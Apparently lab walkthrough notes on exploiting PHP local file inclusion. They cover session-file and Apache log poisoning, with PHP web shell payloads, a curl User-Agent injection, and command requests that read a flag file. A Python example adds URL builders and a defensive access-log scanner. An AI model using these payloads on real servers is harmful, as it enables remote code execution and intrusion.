PHP session poisoning: the session file is sess_ followed by our PHPSESSID cookie value. First include it to confirm it is readable and that the value of the language parameter is saved in it
http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l
Then set language to the PHP web shell so it gets written into the session file (the URL-encoded value is <?php system($_GET["cmd"]);?>)
http://94.237.62.149:55216/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
Now include the poisoned session file again and pass the command with &cmd=
http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=id
http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=pwd
Apache log poisoning: first check that the access log can be included (and read) at all
http://94.237.62.149:55216/index.php?language=/var/log/apache2/access.log
Change the User-Agent to "Apache Log Poisoning" and include the log again; if the string shows up in the output we can write into the log
Then put the PHP web shell in the User-Agent so it gets logged; it reads the command from the cmd GET parameter
Keep the single quotes around cmd: Apache writes a double quote inside a logged header as \", which would break the PHP, so it has to be $_GET['cmd'] and not $_GET["cmd"]. The outer quotes are optional (PHP just echoes text outside the tag)
'<?php system($_GET['cmd']); ?>'
Then add &cmd=id to see which user the web server runs as
/index.php?language=/var/log/apache2/access.log&cmd=id
Now that the log is poisoned, any other command can be run the same way; the value just has to be URL-encoded in the request
/index.php?language=/var/log/apache2/access.log&cmd=ls
/index.php?language=/var/log/apache2/access.log&cmd=cd%20%2F%3B%20ls%20
# cd /; ls   (URL-encoded)
/index.php?language=/var/log/apache2/access.log&cmd=cat%20%2Fc85ee5082f4c723ace6c0796e3a3db09.txt
# cat /c85ee5082f4c723ace6c0796e3a3db09.txt   (URL-encoded)
We could also poison the Apache log from the command line with curl. Escape the $ so the shell does not expand $_GET to an empty string, and keep the single quotes around cmd for the same reason as above
curl -s "http://94.237.62.149:40752/index.php" -A "<?php system(\$_GET['cmd']); ?>"
Then trigger it as before, in Burp Suite or the browser, with
/index.php?language=/var/log/apache2/access.log&cmd=id
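The two vectors above (session-file poisoning and Apache access-log poisoning) as working code, plus the check a defender would run over access.log to spot them. This is an added example, not code from the original notes or from the lab it describes: the target, file paths and session id are copied from the notes, the helper names (session_poison_url, trigger_url, classify, scan) and the sample log lines are assumptions constructed for the example.

```python
"""Added example: URL builders for the session and log poisoning steps in the
notes above, and a heuristic scanner for Apache combined-format access logs.
Target, paths and session id come from the notes; everything else is assumed."""
import re
from urllib.parse import quote, unquote

BASE = "http://94.237.62.149:55216/index.php"
SESSION_FILE = "/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l"  # sess_ + PHPSESSID
ACCESS_LOG = "/var/log/apache2/access.log"

# Stored in the session file as-is, so double quotes inside are fine.
SESSION_PAYLOAD = '<?php system($_GET["cmd"]);?>'
# Sent as User-Agent: Apache logs a literal " inside a header as \", which would
# break the PHP, so the array index must use single quotes.
UA_PAYLOAD = "<?php system($_GET['cmd']); ?>"


def session_poison_url(base=BASE, payload=SESSION_PAYLOAD):
    """Step 2 of the session vector: reflect the PHP payload into the session."""
    return f"{base}?language={quote(payload, safe='')}"


def trigger_url(include_path, cmd, base=BASE):
    """Include the poisoned file and pass the command. The command is fully
    percent-encoded (space, '/' and ';' included), which is the encoding the
    'cd /; ls' and 'cat /...txt' requests in the notes show."""
    return f"{base}?language={quote(include_path, safe='/')}&cmd={quote(cmd, safe='')}"


# Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>.*)")?$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Files and wrappers an include() gets pointed at to execute poisoned content.
INCLUDE_TARGETS = re.compile(
    r"/var/log/|/var/lib/php/sessions/|/proc/self/environ|php://|data:", re.IGNORECASE
)


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(line):
    """Reasons a log line looks like poisoning or an LFI trigger (empty list =
    nothing matched). Heuristic: it flags attempts, not proven execution."""
    entry = parse_line(line)
    if entry is None:
        return ["unparseable"]
    # Decode the request line first: the session payload is sent percent-encoded
    # in the query string and Apache logs it that way, so a raw match would miss it.
    request = unquote(entry["request"])
    fields = [("request", request), ("referer", entry["referer"] or ""), ("user_agent", entry["ua"] or "")]
    reasons = [f"php tag in {name}" for name, value in fields if PHP_TAG.search(value)]
    if INCLUDE_TARGETS.search(request):
        reasons.append("include of log/session/wrapper path")
    if re.search(r"[?&]cmd=", request):
        reasons.append("cmd parameter")
    return reasons


# Constructed sample lines, in the order the attack in the notes happens:
# a normal request, the session payload in the query string, the web shell in
# the User-Agent, and the trigger that includes the log with &cmd=id.
SAMPLE_LOG = [
    '10.10.14.5 - - [12/May/2024:10:01:12 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 2104 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [12/May/2024:10:02:40 +0000] "GET /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E HTTP/1.1" 200 2088 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [12/May/2024:10:03:05 +0000] "GET /index.php HTTP/1.1" 200 2088 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.10.14.5 - - [12/May/2024:10:03:21 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9713 "-" "Mozilla/5.0"',
]


def scan(lines):
    """Line index -> reasons, for every line that was flagged."""
    flagged = {}
    for i, line in enumerate(lines):
        reasons = classify(line)
        if reasons:
            flagged[i] = reasons
    return flagged


if __name__ == "__main__":
    print(session_poison_url())
    print(trigger_url(SESSION_FILE, "id"))
    print(trigger_url(ACCESS_LOG, "cd /; ls "))
    for i, reasons in scan(SAMPLE_LOG).items():
        print(i, reasons, "->", SAMPLE_LOG[i][:80])
```

The scanner decodes the request line before matching because the session payload only ever appears percent-encoded in the log, while the User-Agent payload is logged verbatim; a defender greping the raw file for `<?php` would catch the second vector and miss the first.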